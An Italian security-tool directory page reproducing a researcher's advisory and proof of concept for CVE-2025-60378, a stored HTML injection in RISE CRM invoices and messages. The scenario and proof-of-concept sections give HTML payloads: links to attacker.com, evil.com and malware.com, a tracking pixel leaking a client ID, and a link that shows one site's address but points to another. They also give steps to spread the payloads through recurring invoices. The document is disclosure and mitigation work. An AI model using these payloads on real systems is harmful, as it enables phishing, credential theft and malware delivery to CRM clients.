Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-60378 — Prova di concetto per l'iniezione HTML persistente in RISE CRM, che dimostra come utenti autenticati possano iniettare HTML dannoso in fatture e messaggi, portando a phishing e distribuzione di malware tramite email automatizzate e PDF. | Kitploit
Strumenti/GitHubGitHub/ajansha/cve-2025-60378
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPhishingSicurezza WebApprendimento e Formazione
GitHubajansha/cve-2025-60378

CVE-2025-60378

Prova di concetto per l'iniezione HTML persistente in RISE CRM, che dimostra come utenti autenticati possano iniettare HTML dannoso in fatture e messaggi, portando a phishing e distribuzione di malware tramite email automatizzate e PDF.

Vedi Repository
10 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-60378: Iniezione HTML Persistente in RISE Ultimate Project Manager & CRM

⚠️ Avviso di Sicurezza
Una vulnerabilità critica di Iniezione HTML Persistente che interessa fatture, messaggistica e comunicazioni automatizzate

CVE Severity CVSS Product


📋 Panoramica

È stata scoperta una vulnerabilità critica di Iniezione HTML Persistente in RISE Ultimate Project Manager & CRM che consente a utenti autenticati di iniettare HTML dannoso nelle voci di fattura, nelle note dei clienti e nei moduli di messaggistica. Questo contenuto iniettato persiste nel database e viene automaticamente renderizzato nelle email rivolte ai clienti, nei PDF e nelle comunicazioni chat, consentendo attacchi di phishing su larga scala, compromissione della posta elettronica aziendale e distribuzione di malware tramite email/PDF.

🎯 Versioni Interessate

  • Prodotto: RISE - Ultimate Project Manager & CRM
  • Versioni Vulnerabili: < 3.9.4
  • Versione Corretta: 3.9.4+

🔍 Dettagli della Vulnerabilità

AttributoValore
ID CVECVE-2025-60378
TipoIniezione HTML Persistente
CWECWE-79
Vettore di AttaccoRete/Remoto
AutenticazioneRichiesta (Privilegi Bassi)
Interazione UtenteNessuna
GravitàALTA
CVSS v3.18.1 - Alta
ScopritoreAjansha Shankar

Descrizione

RISE CRM non riesce a sanificare e codificare correttamente il contenuto HTML in diversi campi modificabili dall'utente, incluse fatture, messaggi e note dei clienti. Quando utenti autenticati iniettano payload HTML in questi campi, il contenuto viene memorizzato nel database senza un filtraggio adeguato. Successivamente, questo HTML dannoso viene automaticamente renderizzato nelle email rivolte ai clienti, negli allegati PDF e nei moduli di messaggistica/chat senza una corretta codifica. Le fatture ricorrenti e la messaggistica automatizzata amplificano l'attacco distribuendo contenuti dannosi a più destinatari contemporaneamente.

Componenti Interessati

  • ✗ Voci di fattura (campo descrizione)
  • ✗ Modulo note/messaggistica clienti
  • ✗ Sistema di chat e messaggistica
  • ✗ Modulo di generazione estratti conto clienti
  • ✗ Sistema email automatizzato (fatture ricorrenti, promemoria)
  • ✗ Allegati PDF

Causa Principale

  • ❌ Sanificazione insufficiente degli input nei campi fattura, messaggio e note clienti
  • ❌ Mancanza di codifica dell'output HTML nei template email e nella generazione PDF
  • ❌ Nessuna validazione del contenuto prima della memorizzazione nel database
  • ❌ Assenza di restrizioni su HTML/JavaScript nelle comunicazioni con i clienti
  • ❌ I sistemi automatizzati distribuiscono contenuti non validati senza filtraggio aggiuntivo

💥 Impatto

Implicazioni di Sicurezza

  • 🎣 Phishing su Larga Scala: Il contenuto iniettato può impersonare comunicazioni legittime e reindirizzare più clienti verso siti controllati dall'attaccante
  • 💼 Compromissione della Posta Elettronica Aziendale: Fatture e messaggi dannosi inviati ai clienti sembrano provenire da una fonte attendibile
  • 💬 Messaggistica Compromessa: I payload dannosi nella chat/messaggistica raggiungono direttamente membri del team e clienti
  • 🦠 Distribuzione di Malware: Link o iframe dannosi incorporati distribuiscono malware tramite email/PDF/messaggistica
  • 🔄 Distribuzione Automatica dell'Attacco: Fatture ricorrenti e messaggi automatizzati garantiscono che il payload raggiunga più destinatari senza intervento manuale
  • 👥 Attacco Multi-Vettore: La combinazione di superfici di attacco email, PDF e messaggistica aumenta il tasso di compromissione riuscita

Valutazione Triade CIA

FattoreImpattoSpiegazione
Riservatezza🔴 ALTALe credenziali dei clienti e i dati sensibili possono essere raccolti tramite phishing
Integrità🔴 ALTAIl contenuto dannoso può alterare la percezione delle comunicazioni e delle relazioni commerciali
Disponibilità🟡 BASSAImpatto diretto limitato sulla disponibilità del sistema

Scenari di Attacco nel Mondo Reale

Scenario 1: Campagna di Phishing Basata su Fatture

Un attaccante con accesso a privilegi bassi come project manager crea una fattura con HTML dannoso:

root@kitploit:~
<a href="https://attacker.com/fake-payment">Click here to view payment status</a>

La fattura viene inviata a oltre 100 clienti tramite email automatizzata. Tutti i clienti ricevono quella che sembra una fattura legittima che li indirizza a un sito di phishing. L'attaccante raccoglie le credenziali di più vittime contemporaneamente.

Scenario 2: Attacco Basato sulla Messaggistica

Un attaccante inietta HTML dannoso in un messaggio per il cliente:

root@kitploit:~
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>

Tutti i membri del team e i clienti ricevono il messaggio nella loro chat e cliccando sui link scaricano malware.

Scenario 3: Distribuzione di Malware tramite Fatture Ricorrenti

Un attaccante configura una fattura ricorrente con un payload di distribuzione malware. Ogni mese, i clienti ricevono automaticamente fatture con contenuto dannoso incorporato, fornendo un vettore di attacco persistente.

🧪 Prova di Concetto

Configurazione dell'Ambiente

  • Accesso al pannello di amministrazione RISE CRM con permessi di creazione fatture/messaggi
  • Qualsiasi versione precedente alla 3.9.4

Passaggi della PoC

Passo 1: Accedere alla Creazione di Fatture o Messaggi

root@kitploit:~
Navigare a: Dashboard RISE CRM → Fatture/Messaggi → Crea Nuovo

Passo 2: Iniettare il Payload HTML nel Campo Descrizione/Messaggio

root@kitploit:~
<a href="https://attacker.com">Click here to view invoice</a>

Passo 3: Aggiungere un'Immagine Dannosa con Reindirizzamento

root@kitploit:~
<a href="https://evil.com" target="_blank">
  <img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>

Passo 4: Aggiungere un Payload di Stile Fuorviante

root@kitploit:~
<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>

Passo 5: Configurare la Distribuzione Ricorrente

  • Salvare il record
  • Abilitare l'opzione "Ricorrente" (se disponibile per fatture/messaggi)
  • Impostare la frequenza (settimanale, mensile, ecc.)
  • Il sistema invia automaticamente a tutti i clienti interessati

Passo 6: Verificare il Vettore di Attacco

  • Controllare la casella email del cliente
  • Controllare la messaggistica/chat del cliente
  • Aprire l'allegato PDF
  • Osservare l'HTML dannoso renderizzato in tutti i canali

Risultato Atteso

✅ L'HTML iniettato viene renderizzato in email, PDF e messaggistica senza codifica ✅ I link sono cliccabili e reindirizzano ai siti dell'attaccante ✅ Le immagini vengono caricate da server controllati dall'attaccante ✅ Il contenuto persiste in tutte le future comunicazioni con i clienti ✅ La distribuzione ricorrente raggiunge automaticamente più destinatari

🛡️ Mitigazione

Per gli Utenti Finali

  1. ✅ Aggiornare Immediatamente: Aggiornare a RISE CRM v3.9.4 o successiva
  2. 🔍 Controllare Tutti i Record: Rivedere fatture, messaggi e note clienti recenti per contenuti HTML sospetti
  3. ⚠️ Notifica ai Clienti: Avvisare tutti i clienti se sono state inviate fatture o messaggi sospetti
  4. 🔄 Reimpostazione delle Credenziali: Consigliare ai clienti di cambiare le password se hanno cliccato sui link
  5. 📝 Monitoraggio dell'Attività: Controllare i log di audit per modifiche non autorizzate a fatture/messaggi
  6. 🔐 Disabilitare la Ricorrenza: Disabilitare temporaneamente fatture/messaggi ricorrenti fino alla correzione

📚 Riferimenti

  • CWE-79: Neutralizzazione Impropria dell'Input Durante la Generazione di Pagine Web
  • OWASP: Cross-site Scripting (XSS)
  • OWASP: Iniezione HTML
  • OWASP: Codifica dell'Output
  • Voce Ufficiale CVE-2025-60378

📅 Cronologia

DataEvento
Da definireVulnerabilità scoperta
Da definireFornitore notificato
Da definireCVE-2025-60378 assegnato
Da definirePatch rilasciata (v3.9.4)
Da definireDivulgazione pubblica

👤 Crediti

Scoperto da: Ajansha Shankar

LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

📊 Valutazione CVSS v3.1

Vettore: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Punteggio: 8.1 (ALTA)

Dettaglio:

  • Vettore di Attacco (AV:N): Rete - Può essere sfruttato da remoto
  • Complessità dell'Attacco (AC:L): Bassa - Nessuna condizione speciale richiesta
  • Privilegi Richiesti (PR:L): Bassi - Richiede un utente autenticato con privilegi base di project manager
  • Interazione Utente (UI:N): Nessuna - Nessuna interazione utente necessaria; i sistemi automatizzati distribuiscono il payload
  • Ambito (S:U): Invariato - L'impatto è limitato al componente vulnerabile
  • Riservatezza (C:H): Alta - Potenziale furto di credenziali tramite phishing verso più clienti
  • Integrità (I:H): Alta - Il contenuto dannoso può essere iniettato e consegnato a più destinatari
  • Disponibilità (A:N): Nessuna - Nessun impatto sulla disponibilità del sistema

📧 Contatti

Per domande o informazioni aggiuntive:

  • LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

⭐ Se questa ricerca è stata utile, considera di mettere una stella a questo repository!

🔔 Rimani aggiornato: Segui questo repository per aggiornamenti su questa e future ricerche di sicurezza.

  • CVE-2025-60374 - XSS Persistente nel Chatbot di Perfex CRM
  • CVE-2025-55903 - Iniezione HTML Persistente nelle Fatture di Perfex CRM
  • CVE-2025-60375 - Bypass dell'Autenticazione in Perfex CRM
Scarica lo strumento